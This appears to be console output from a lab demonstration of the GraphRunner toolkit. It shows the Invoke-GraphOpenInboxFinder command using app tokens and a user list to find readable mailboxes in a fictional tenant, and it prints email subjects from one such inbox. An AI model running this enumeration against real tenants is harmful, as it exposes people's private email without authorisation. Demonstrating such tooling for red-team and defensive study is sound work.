PS C:\Users\beau\Desktop\GraphRunner> Invoke-GraphOpenInboxFinder -Tokens $apptokens -userlist azureadusers.txt
[*] Note: To read other user's mailboxes your token needs to be scoped to the Mail.Read.Shared or Mail.ReadWrite.Shared permissions.


[*] Checking access to mailboxes for each email address...


[*] SUCCESS! Inbox of deckard@tyrellcorporation.io is readable.
Latest Email Received 2023-09-03T21:29:40Z 2023-09-03T14:28:55Z 2023-09-03T14:24:15Z 2023-08-25T17:02:31Z 2023-08-17T01:24:43Z 2023-08-15T02:16:27Z 2023-08-15T01:17:00Z 2023-08-10T19:59:25Z with subject: Dr. sent a message Re: New Assignment New Assignment Default Directory invited you to access applications within their organization You've joined the Test Team Site group Fwd: Sweet Meets Heat with Hoff's Original BBQ Sauce 🍖🔥 Bug Bounty Program Super Secret Data
[*] SUCCESS! Inbox of roy@tyrellcorporation.io is readable.
Latest Email Received  with subject: